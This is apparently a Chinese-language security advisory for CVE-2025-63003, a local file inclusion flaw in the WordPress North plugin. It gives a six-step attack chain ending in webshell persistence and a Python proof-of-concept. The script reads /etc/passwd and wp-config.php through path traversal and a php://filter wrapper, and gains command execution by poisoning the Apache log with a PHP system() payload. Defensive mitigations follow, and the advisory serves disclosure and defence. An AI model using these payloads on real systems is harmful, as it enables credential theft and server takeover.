CVE-2025-63003 WordPress North插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-63003

漏洞类型

本地文件包含(LFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

fuelthemes North - Required Plugin (north-plugin)

漏洞概述

CVE-2025-63003是WordPress主题North插件中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于PHP本地文件包含(Local File Inclusion, LFI)类型，源于插件对文件包含操作中的文件名控制不当。攻击者可以通过构造恶意请求，利用该漏洞读取服务器上的敏感文件，如配置文件、密码文件、源代码等。在特定条件下，攻击者甚至可能结合其他漏洞实现远程代码执行。漏洞影响范围涵盖插件1.4.2及以下所有版本，鉴于该插件是North主题的必需组件，被大量网站使用，因此该漏洞可能影响大量WordPress站点。漏洞由Patchstack安全团队于2025年12月9日披露，建议受影响的网站管理员立即采取修复措施。

技术细节

该漏洞存在于north-plugin插件的文件包含逻辑中。PHP的include/require语句在处理用户输入的文件路径时缺乏充分的验证和过滤，攻击者可以通过URL参数或POST请求注入路径遍历序列(如../)和恶意文件路径。由于PHP的文件包含机制会执行被包含文件的代码，攻击者可利用此漏洞：(1)读取服务器本地敏感文件，如/etc/passwd、wp-config.php等；(2)结合日志文件污染实现远程代码执行；(3)利用PHP伪协议(如php://filter)读取加密或禁止访问的文件内容。CVSS向量显示攻击复杂度为高(H)，需要低权限认证，但无需用户交互，且对机密性、完整性和可用性均造成高影响。漏洞的技术根源在于缺乏对输入路径的规范化处理和严格的白名单验证。

攻击链分析

STEP 1

1 - 信息收集

攻击者识别目标网站使用的WordPress主题，确认为North主题并检查north-plugin插件版本

STEP 2

2 - 漏洞探测

攻击者通过测试不同的文件包含参数(如file、page、include等)，确认插件存在本地文件包含漏洞

STEP 3

3 - 敏感文件读取

利用路径遍历(../../)读取服务器敏感文件，如/etc/passwd、wp-config.php获取数据库凭证和API密钥

STEP 4

4 - 日志污染

攻击者向Web服务器日志注入恶意PHP代码，作为后续RCE的有效载荷

STEP 5

5 - 代码执行

通过LFI包含被污染的日志文件，触发恶意PHP代码执行，获得服务器远程命令执行权限

STEP 6

6 - 持久化控制

上传Webshell或创建后门账户，实现长期持久化控制，可能进一步横向移动或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-63003 PoC - Local File Inclusion in WordPress North Plugin
# Affected: north-plugin <= 1.4.2

import requests
import urllib.parse

target_url = "http://target-site.com/"

# PoC 1: Basic LFI to read /etc/passwd
def test_lfi_basic():
    """Basic LFI test to read system files"""
    params = {
        'file': '../../../../../../etc/passwd',
        'action': 'north_include'
    }
    response = requests.get(target_url, params=params)
    if 'root:' in response.text:
        print('[+] LFI Confirmed - /etc/passwd readable')
    return response.text

# PoC 2: Read WordPress config file
def test_wp_config():
    """Read WordPress configuration with database credentials"""
    params = {
        'file': '../../wp-config.php',
        'action': 'north_include'
    }
    response = requests.get(target_url, params=params)
    if 'DB_NAME' in response.text:
        print('[+] WordPress config file readable')
    return response.text

# PoC 3: PHP Filter wrapper to read source code
def test_php_filter():
    """Use PHP filter wrapper to read encoded source files"""
    encoded_path = urllib.parse.quote('php://filter/read=convert.base64-encode/resource=../../wp-config.php')
    params = {
        'file': encoded_path,
        'action': 'north_include'
    }
    response = requests.get(target_url, params=params)
    print('[+] Attempting PHP filter wrapper technique')
    return response.text

# PoC 4: Authenticated RCE via log poisoning (if combined with other vulns)
def test_log_poisoning():
    """Log poisoning technique for RCE (requires additional conditions)"""
    # Inject PHP code into access log
    log_poison = "<?php system($_GET['cmd']); ?>"
    headers = {'User-Agent': log_poison}
    requests.get(target_url, headers=headers)
    
    # Execute command via LFI
    exec_params = {
        'file': '../../../../var/log/apache2/access.log',
        'action': 'north_include',
        'cmd': 'id'
    }
    response = requests.get(target_url, params=exec_params)
    return response.text

if __name__ == '__main__':
    print('Testing CVE-2025-63003')
    test_lfi_basic()
    test_wp_config()

影响范围

north-plugin <= 1.4.2 (所有版本)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：(1)临时禁用north-plugin插件或切换到其他安全的主题；(2)通过Web应用防火墙规则阻止包含file、page等参数的异常请求；(3)限制PHP的allow_url_include和open_basedir配置，防止远程文件包含和敏感目录访问；(4)对wp-config.php等敏感文件设置严格的文件权限(444)；(5)启用WordPress安全插件(如Wordfence)提供实时防护；(6)监控服务器日志中的异常文件包含请求模式。